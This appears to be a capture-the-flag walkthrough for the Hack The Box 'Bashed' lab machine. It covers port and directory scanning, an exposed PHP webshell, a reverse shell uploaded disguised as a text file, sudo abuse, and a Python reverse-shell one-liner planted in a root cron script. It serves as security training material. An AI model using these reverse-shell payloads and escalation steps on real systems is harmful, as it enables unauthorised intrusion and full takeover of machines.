Posted on Apr 29, 2020
tl;dr: box takeover with webshell and python

Information Gathering

IP address:


$ nmap -sC -sV -oA nmap/bashed -p- -Pn -T4  
Starting Nmap 7.80 ( []( ) at 2020-04-29 21:23 CEST  
Nmap scan report for  
Host is up (0.031s latency).  
Not shown: 65534 closed ports  
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))  
|_http-server-header: Apache/2.4.18 (Ubuntu)  
|_http-title: Arrexel's Development Site  
Service detection performed. Please report any incorrect results at []( .  
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds
Open ports


A webpage was presented on port: 80 htb-bashed-1


Some interesting folders were found with gobuster.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u [](

Gobuster v3.0.1  
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)  
[+] Url: [](  
[+] Threads: 10  
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
[+] Status codes: 200,204,301,302,307,401,403  
[+] User Agent: gobuster/3.0.1  
[+] Timeout: 10s  
2020/04/29 21:29:43 Starting gobuster  
/images (Status: 301)  
/uploads (Status: 301)  
/php (Status: 301)  
/css (Status: 301)  
/dev (Status: 301)  
/js (Status: 301)  
/fonts (Status: 301)  
/server-status (Status: 403)  
2020/04/29 21:40:54 Finished  

under the /dev folder there’s a file called phpbash.php which is a webshell that we can use to our benefit.

Visit the webshell and see if we can get the contents of user.txt

www-data@bashed:/home/arrexel# cat user.txt  

in order to get a reverse shell instead, lets set up a php-reverse shell.

kryssar@kali:/var/www/html$ sudo cp /usr/share/webshells/php/php-reverse-shell.php .  
mv php-reverse-shell.php phprev.php

Change the IP and necessary information to connect back to Kali on port 9443, then download the file (presented via apache/python on port 80) to the victim.


There were some issues with uploading it as PHP so instead upload it as .txt and then rename it on the target. Once it’s renamed , try visiting the webpage from our Kali machine and see if the code executes more properly.

kryssar@kali:/media/sf_PENTEST/HTB/bashed$ nc -nlvp 1234  
Ncat: Version 7.80 ( []( )  
Ncat: Listening on :::1234  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux  
13:36:58 up 1:11, 0 users, load average: 0.00, 0.00, 0.00  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
/bin/sh: 0: can't access tty; job control turned off  
$ id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  

Upgrade the shell so we get a proper prompt and some better handling.

python -c 'import pty; pty.spawn("/bin/bash")'

Once the shell is upgraded, it’s time to check out the permissions on this ride.

www-data@bashed:/$ sudo -l  
Matching Defaults entries for www-data on bashed:  
env_reset, mail_badpass,  
User www-data may run the following commands on bashed:  
(scriptmanager : scriptmanager) NOPASSWD: ALL

It looks like we can run anything as the scriptmananger user, so lets try to use those permissions to our advantage. Perhaps send back a reverse shell ?

under a folder called scripts there’s an interesting file called with the contents:

scriptmanager@bashed:/scripts$ cat  
f = open("test.txt", "w")  
f.write("testing 123!")  

Perhaps this file is run by the server every now and then ? lets use a trick from pentestmonkey to run a python reverse shell.

echo -n "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/bash\",\"-i\"]);" >

Observe! character escaping is important (it was a source of some headache.)

once the runs (it’s on a timer and runs every minute, as long as there’s a listener on our kali machine, the reverse shell will be sent out.)

Ncat: Version 7.80 ( []( )  
Ncat: Listening on :::1235  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
bash: cannot set terminal process group (17527): Inappropriate ioctl for device  
bash: no job control in this shell  
root@bashed:/scripts# cd ~ && cat root.txt